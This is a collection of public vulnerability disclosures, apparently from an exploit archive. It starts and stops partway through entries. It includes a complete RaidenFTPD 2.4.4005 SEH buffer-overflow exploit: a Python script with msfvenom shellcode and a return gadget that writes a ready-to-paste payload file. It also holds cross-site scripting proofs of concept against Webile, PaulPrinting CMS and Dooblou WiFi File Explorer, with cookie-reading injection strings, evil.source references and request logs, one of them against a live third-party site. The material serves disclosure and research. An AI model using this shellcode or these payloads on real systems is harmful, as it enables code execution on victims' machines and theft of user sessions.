rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Connection: keep-alive Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; - GET: HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache, private 
Set-Cookie: Vary: Accept-Encoding Content-Length: 7866 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 - Vulnerable Source: asset-manager/albums/[ID] <li data-album="36"> <a href="#albums/20"> <div> <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3> <p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p> <p class='count'><span>0</span> assets</p> </div> </a> </li> </iframe></p></div></a></li></ul></div></div> </div> <div id="b-assets-view-asset-container"></div> <div id="b-assets-view-selection-container"></div> <div id="b-assets-view-album-container"><div><div id="b-assets-view-album"> <div class="heading"> <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1> <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p> </div> Solution - Fix & Patch: ======================= Contextually encode the album title and description at every output location shown above: HTML-entity-encode them in the album listing (the <h3> and <p class="description"> elements) and in the contenteditable heading and description of the album view, so stored `<`, `>`, `"` and `'` cannot be interpreted as markup. The application appears to be Laravel-based (laravel_session cookie), in which case emitting these values through escaped Blade output (`{{ }}`) rather than raw output (`{!! !!}`) achieves this. Restricting special characters on input is only a secondary defence; the quote-escaping applied on save targets SQL, not HTML, and does not prevent this issue. Security Risk: ============== The security risk of the persistent input validation web vulnerability in the application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
-
RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
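# Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
# Date: 18/07/2023
# Exploit Author: Andre Nogueira
# Vendor Homepage: https://www.raidenftpd.com/en/
# Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe
# Version: RaidenFTPD 2.4.4005
# Tested on: Microsoft Windows 10 Build 19045

# 1.- Open RaidenFTPD
# 2.- Click on 'Setup' -> 'Step by step setup wizard'
# 3.- Run python code: exploit-raidenftpd.py
# 4.- Paste the content of exploit-raiden.txt into the field 'Server name'
# 5.- Click 'next' -> 'next' -> 'ok'
# 6.- Pop calc.exe

#!/usr/bin/env python3
"""Build the SEH-overwrite payload file for the RaidenFTPD 'Server name' field.

Layout of the `crash`-byte buffer written to exploit-raiden.txt:

    [ 'A' * offset ][ nSEH: jmp short +6 ][ SEH: pop/pop/ret ][ shellcode ][ 'D' padding ]

The overflow overwrites the SEH record. When the exception fires, the
handler address (SEH) points at a pop/pop/ret gadget, which returns into
the nSEH field; nSEH holds a short jump that skips the 4-byte handler
address and lands on the shellcode.
"""
from struct import pack

crash = 2000  # total input length that crashes the wizard field
offset = 497  # filler bytes before the nSEH record is overwritten

# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d"
# 8 NOPs lead the encoded stub; the encoder was told to avoid \x00 and \x0d.
shellcode = b"\x90" * 8
shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4"
shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f"
shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93"
shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f"
shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9"
shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea"
shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37"
shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98"
shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99"
shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66"
shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6"
shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1"
shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb"
shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81"
shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56"
shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed"
shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b"
shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0"
shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b"
shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc"

# nSEH: "\xeb\x06" = JMP SHORT +6, measured from the end of the 2-byte jump,
# so execution resumes 8 bytes after the start of nSEH -- i.e. immediately
# after the 4-byte SEH address, on the shellcode. Two NOPs pad nSEH to 4 bytes.
nSEH = b"\xeb\x06\x90\x90"
# SEH: pop eax; pop esi; ret in msvcp70.dll on the author's test build
# (Windows 10 19045). Gadget addresses are environment-specific: re-verify the
# address and the module's suitability (e.g. no SafeSEH) before reusing this.
SEH = pack("<L", 0x7c1e76ff)

buffer = b"A" * offset
buffer += nSEH
buffer += SEH
buffer += shellcode

padding = crash - len(buffer)
if padding < 0:
    # b"D" * <negative> silently yields b"" and the file would exceed `crash`
    # bytes, masking a broken layout; fail loudly instead.
    raise ValueError(f"payload exceeds crash length by {-padding} bytes")
buffer += b"D" * padding

print("[*] Creating the .txt file for out payload")
# Context manager guarantees the file is flushed and closed even if write() fails.
with open("exploit-raiden.txt", "wb") as file_payload:
    print("[*] Writing malicious payload to the .txt file")
    file_payload.write(buffer)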
-
Webile v1.0.1 - Multiple Cross Site Scripting
Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2321 Release Date: ============= 2023-07-03 Vulnerability Laboratory ID (VL-ID): ==================================== 2321 Common Vulnerability Scoring System: ==================================== 5.5 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data, statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac, Windows, Linux, iOS, Android and other multi-platform operating systems. (Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application. 
Affected Product(s): ==================== Product Owner: Webile Product: Webile v1.0.1 - (Framework) (Mobile Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-10-11: Researcher Notification & Coordination (Security Researcher) 2022-10-12: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own malicious script codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. 
Request Method(s): [+] POST Vulnerable Parameter(s): [+] new_file_name [+] i Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Vulnerable Source: Send Send message to phone listing <div class="layui-colla-item"> <div class="layui-card-header">Message</div> <div class="layui-colla-content" style="display:block;padding-left:16px;"> <div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;" title="Copy" onclick="copy(1658081411827)"><i class="iconfont"> </i></a><br> <span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div> </div></div></div> history logs messages <table class="layui-table layui-form"> <thead><tr> <th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center"> <input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th> <th style="border-right-width:1px;">Message</th> <th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th> <th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr> </thead> <tbody><tr> <td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center"> <input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div> </td> <td 
style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td> <td align="center">2022/07/17 20:10</td> <td class="td-manage" style="border-right-width:1px;text-align:center;"> <a title="Copy" onclick="copy(3)" href="javascript:;"> <i class="iconfont"> </i> </a> <a title="Delete" onclick="deleteLog(this,3)" href="javascript:;"> <i class="layui-icon"> </i> </a></td></tr></tbody></table> --- PoC Session Logs #1 (POST) --- (Add) http://localhost:8080/file_action Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 210 Origin:http://localhost:8080 Connection: keep-alive Referer:http://localhost:8080/webile_files Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"} - POST: HTTP/1.1 200 OK Content-Type: application/json Connection: keep-alive Content-Encoding: gzip Transfer-Encoding: chunked - http://localhost:8080/evil.source Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8080/webile_files Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Content-Type: application/octet-stream Connection: keep-alive Content-Length: 0 - Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 --- PoC Session Logs #2 (POST) --- (Send) 
http://localhost:8080/send Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 180 Origin:http://localhost:8080 Connection: keep-alive Referer:http://localhost:8080/webile_send Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"} - POST: HTTP/1.1 200 OK Content-Type: application/json Connection: keep-alive Content-Encoding: gzip Transfer-Encoding: chunked - http://localhost:8080/evil.source Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8080/webile_send Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Content-Type: application/octet-stream Date: Sun, 17 Jul 2022 18:08:33 GMT Connection: keep-alive Content-Length: 0 Security Risk: ============== The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.
PaulPrinting CMS - (Search Delivery) Cross Site Scripting
Exploit Title: PaulPrinting CMS - (Search Delivery) Cross Site Scripting References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2286 Release Date: ============= 2023-07-17 Vulnerability Laboratory ID (VL-ID): ==================================== 2286 Common Vulnerability Scoring System: ==================================== 5.2 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Product & Service Introduction: =============================== PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface. (Copy of the Homepage:https://codecanyon.net/user/codepaul ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the PaulPrinting (v2018) cms web-application. Vulnerability Disclosure Timeline: ================================== 2022-08-25: Researcher Notification & Coordination (Security Researcher) 2022-08-26: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Open Authentication (Anonymous Privileges) User Interaction: ================= Medium User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application. 
Remote attackers are able to manipulate client-side requests by injecting malicious script code to compromise user session data. The client-side cross site scripting web vulnerability is located in the search input field with the insecurely validated q parameter affecting the delivery module. Remote attackers are able to inject their own malicious script code into the search input to provoke a client-side script code execution without secure encoding. The request method to execute is GET and the attack vector is non-persistent. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Request Method(s): [+] GET Vulnerable Module(s): [+] /account/delivery Vulnerable Input(s): [+] Search Vulnerable Parameter(s): [+] q Affected Module(s): [+] /account/delivery [+] Delivery Contacts Proof of Concept (PoC): ======================= The non-persistent xss web vulnerability can be exploited by remote attackers with a low privileged user account and medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. 
PoC: Example https://codeawesome.in/printing/account/delivery?q= PoC: Exploitation https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)> --- PoC Session Logs (GET) --- https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)> Host: codeawesome.in Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf; - GET: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 x-powered-by: PHP/7.1.33 Vulnerable Source: (Search - delivery?q=) <div class="col-lg-8"> <a href="https://codeawesome.in/printing/account/delivery" class="btn btn-primary mt-4 mb-2 float-right"> <i class="fa fa-fw fa-plus"></i> </a> <form class="form-inline mt-4 mb-2" method="get"> <div class="input-group mb-3 mr-2"> <input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" onload="alert(document.cookie)">"> <div class="input-group-append"> <button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw fa-search"></i></button> </div></div> Security Risk: ============== The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities
#Exploit Title: Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2317 Release Date: ============= 2023-07-04 Vulnerability Laboratory ID (VL-ID): ==================================== 2317 Common Vulnerability Scoring System: ==================================== 5.1 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection. No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s. (Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application. 
Affected Product(s): ==================== Product Owner: dooblou Product: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-01-19: Researcher Notification & Coordination (Security Researcher) 2022-01-20: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple input validation web vulnerabilities have been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application. The vulnerability allows remote attackers to inject their own malicious script code with a non-persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The content requested via GET method request is insecurely validated and executes malicious script code. The attack vector is non-persistent and the request method to inject is GET. Attackers do not need to be authorized to perform an attack to execute malicious script code. The links can be included, for example, as a malformed upload to provoke an execution on a view of the front- & backend of the wifi explorer. 
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Proof of Concept (PoC): ======================= The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue. PoC: Exploitation http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a> http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3 http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3 http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX Vulnerable Sources: Execution Points <table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><td style="vertical-align:top;"><table style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><span class="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><tabl e style="background-color: #B2B2B2; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"> <tbody><tr><td><span 
class="doob_medium_text">Cannot find file or directory! /storage/emulated/0/Download/<a href="https://evil.source" onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURN INDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link"> <a href="/">>> Back To Files >></a></span></span><br></td></tr></tbody></table><br> - <li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr> <td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST"> <input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td> <table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold"> </span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold"> <a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"> <img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a> | <a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"> <img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" 
title="Thumbnails"></a> | <a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I - <td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();"> <a class="doob_button" href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source" onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();" style="">Download</a> <a class="doob_button" href="javascript:setMultiSelectConfirm('Are you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action', '13&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a> <a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy", "/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source" onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();' style="">Create Copy</a> <a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a> <a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td> <td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold"> <a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a> | <a href="?view=23&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a> | <a href="?view=24&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" 
alt="img" title="Thumbnails"></a> | <a href="?view=38&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img" title="Thumbnails"></a> </span></td></tr></table> ---PoC Session Logs --- http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E GET: HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml - http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3 Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: treeview=0 Upgrade-Insecure-Requests: 1 GET: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html - http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: 
de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source" onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E GET: HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml Security Risk: ============== The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium.
PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities
Exploit Title: PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2285 Release Date: ============= 2023-07-19 Vulnerability Laboratory ID (VL-ID): ==================================== 2285 Common Vulnerability Scoring System: ==================================== 5.8 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface. (Copy of the Homepage:https://codecanyon.net/user/codepaul ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the PaulPrinting (v2018) cms web-application. Affected Product(s): ==================== CodePaul Product: PaulPrinting (2018) - CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-08-25: Researcher Notification & Coordination (Security Researcher) 2022-08-26: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-19: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple persistent input validation vulnerabilities has been discovered in the 
official PaulPrinting (v2018) cms web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser to web-application requests from the application-side. The first vulnerability is located in the register module. Remote attackers are able to register a user account with malicious script code. After registration, the attacker provokes an execution of the malformed scripts on review of the settings or by user reviews of admins in the backend (listing). The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject their own malicious script code into contact details. This allows an execution on each interaction with users or by reviews of admins in the backend (listing). Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] /printing/register [+] /account/delivery Vulnerable Input(s): [+] First name [+] Last name [+] Address [+] City [+] State Vulnerable Parameter(s): [+] firstname [+] lastname [+] address [+] city [+] state Affected Module(s): [+] Frontend Settings (./printing/account/setting) [+] Frontend Delivery Address (./printing/account/delivery) [+] Backend User Preview Listing [+] Backend Delivery Address Contact Review Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers with a low privileged user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open your browser and start an http session tamper 2. Register in the application by clicking register on the login page 